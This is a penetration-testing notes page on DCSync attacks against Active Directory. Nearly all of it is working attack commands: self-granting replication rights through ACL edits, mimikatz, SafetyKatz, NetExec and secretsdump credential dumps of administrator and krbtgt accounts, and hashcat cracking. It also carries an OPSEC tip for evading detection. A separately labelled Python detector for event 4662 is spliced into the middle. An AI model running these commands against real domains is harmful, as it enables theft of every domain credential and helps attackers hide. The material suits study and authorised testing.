# DCSync

In Active Directory environments, multiple Domain Controllers (DCs) replicate data using the Directory Replication Service Remote Protocol (DRSR). The DCSync technique abuses this by **impersonating a DC and requesting user credential data**, essentially pulling `ntds.dit` contents over the network without code execution on a real DC. Critically, DCs do not verify that the requester is really a DC; they only check that the authenticated caller's SID holds the required replication privileges.

To perform DCSync, an attacker must control an account with the following rights: `Replicating Directory Changes`, `Replicating Directory Changes All`, and sometimes `Replication-Get-Changes-In-Filtered-Set`. These are assigned by default to Domain Admins, Enterprise Admins, and built-in Administrators.

However, if you have [`WriteDACL`](https://x7331.gitbook.io/boxes/tl-dr/active-directory/permissions/writedacl) over a privileged account, you can delegate these rights yourself. Notably, the [Exchange Windows Permissions](https://x7331.gitbook.io/boxes/tl-dr/active-directory/groups/exchange-windows-permissions) group often has DCSync rights in enterprise environments. For an example of leveraging `WriteDACL` to perform DCSync see [Forest](https://x7331.gitbook.io/boxes/boxes/easy/forest).
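The replication rights listed above are also what defenders key on: every use of them is logged as Security event 4662 with the right's `rightsGuid` in the `Properties` field. The following Python sketch is an added example (not part of this page or of the tools it lists) that scans constructed, flattened 4662 records for those GUIDs, including the two used in the manual ACL step further down, and flags any caller that is not an allowlisted DC computer account; it goes one step beyond the page by also covering the filtered-set right. The record format, the DC allowlist names and the sample events are assumptions.

```python
import re
from typing import Dict, List, Tuple

# rightsGuid values that show up in the Properties field of Security event 4662
# when a caller exercises a replication extended right. The first two GUIDs are
# the ones used on this page; the third is the schema value for the filtered-set
# right (assumed from the AD schema, not taken from this page).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Allowlist of real DC computer accounts (hypothetical names). Filtering on a
# trailing '$' alone would also hide a non-DC machine account doing the same.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}
GUID_RE = re.compile(r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.I)

# Constructed sample records in a flattened key=value form, not real exports.
SAMPLE_EVENTS = """\
EventID=4662 SubjectUserName=DC01$ SubjectDomainName=DOMAIN ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=WS01$ SubjectDomainName=DOMAIN ObjectType=domainDNS Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=hacker SubjectDomainName=DOMAIN ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=administrator SubjectDomainName=DOMAIN ObjectType=user Properties={00000000-0000-0000-0000-00000000abcd}
EventID=4624 SubjectUserName=hacker SubjectDomainName=DOMAIN LogonType=3
"""


def parse_event(line: str) -> Dict[str, object]:
    """Split one flattened record into fields; Properties becomes a GUID list."""
    fields: Dict[str, object] = dict(re.findall(r"(\w+)=(\S+)", line))
    props = line.split("Properties=", 1)[1] if "Properties=" in line else ""
    fields["Properties"] = [g.lower() for g in GUID_RE.findall(props)]
    return fields


def detect_dcsync(log_text: str) -> List[Tuple[str, List[str]]]:
    """Return (DOMAIN\\account, [rights]) for every 4662 event in which a
    principal that is not an allowlisted DC exercised a replication right."""
    alerts: List[Tuple[str, List[str]]] = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = [REPL_RIGHTS[g] for g in ev["Properties"] if g in REPL_RIGHTS]
        if not rights or ev.get("SubjectUserName") in KNOWN_DC_ACCOUNTS:
            continue  # no replication right used, or legitimate DC-to-DC traffic
        alerts.append((f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}", rights))
    return alerts
```

Run against the sample data it reports `WS01$` and `hacker` but not `DC01$`, which is exactly why a replication request made as a real DC account draws no alert from this kind of filter.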

## Tools

{% hint style="warning" %}
**OPSEC**: Performing a DCSync with `DC$` will typically fly under the radar.
{% endhint %}

{% tabs %}
{% tab title="Windows" %}
We can enumerate permissions using an elevated CMD or PS session.

```powershell
# Command Prompt
dsacls "DC=domain,DC=local"
# PowerShell (PowerView)
Get-DomainObjectAcl -Identity <USER> -Domain domain.local -ResolveGUIDs
```

We can assign DCSync rights manually or automatically using [PowerView](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/powerview) or `DCSync.py`.

> *The manual way is explained [here](https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md).*

{% code overflow="wrap" %}

```powershell
# Manually
$acl = Get-Acl "ad:DC=domain,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = New-Object System.Security.Principal.SecurityIdentifier $user.SID
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
# rightsGuid for the extended right DS-Replication-Get-Changes-All
$objectGuid = New-Object Guid "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# rightsGuid for the extended right DS-Replication-Get-Changes
$objectGuid = New-Object Guid "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-Acl -AclObject $acl "ad:DC=domain,DC=local"

# PowerView
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <USER> -Rights DCSync
```

{% endcode %}

Once the rights have been assigned, we can perform the attack with [`mimikatz`](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/mimikatz).

```powershell
# Mimikatz (PS script)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"'
# Mimikatz (binary)
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator
```

Finally, we can crack the hash using [`hashcat`](https://x7331.gitbook.io/boxes/tools/passwords/hashcat) on our attacking machine.

{% code overflow="wrap" %}

```bash
hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule --force
```

{% endcode %}
{% endtab %}

{% tab title="Linux" %}

We can assign DCSync rights using `DCSync.py`.

{% code overflow="wrap" %}

```bash
# DCSync.py
DCSync.py -dc domain.local -t 'CN=<USER>,CN=Users,DC=domain,DC=local' 'domain.local\<USER>:<PASS>'
```

{% endcode %}

We can also perform the attack with [`NetExec`](#netexec) or [Impacket](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/impacket)'s `secretsdump` script.

```bash
# NetExec
nxc smb 10.10.10.161 -u '<USER>' -p '<PASS>' --ntds --user administrator

# Impacket's secretsdump
impacket-secretsdump htb.local/hacker@10.10.10.161 -just-dc-user administrator
```

> *For an example of a DCSync attack using `DCSync.py` and `secretsdump.py` see [here](https://x7331.gitbook.io/boxes/boxes/boxes/easy/active#eop-via-kerberoasting). For an example of a DCSync attack using NetExec see [here](https://x7331.gitbook.io/boxes/boxes/boxes/easy/sauna#dcsync-attack).*

Finally, we can crack the hash using [`hashcat`](https://x7331.gitbook.io/boxes/tools/passwords/hashcat) on our attacking machine.

{% code overflow="wrap" %}

```bash
hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule --force
```

{% endcode %}
{% endtab %}

{% tab title="SafetyKatz" %}
SafetyKatz can be used to perform a DCSync attack:

```powershell
.\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

{% endtab %}
{% endtabs %}

## Resources

* An in-depth article about DCSync from Altered Security ([article](https://www.alteredsecurity.com/post/a-primer-on-dcsync-attack-and-detection))
* What `impacket-secretsdump` does behind the scenes ([video](https://www.youtube.com/watch?v=QfyZQDyeXjQ))


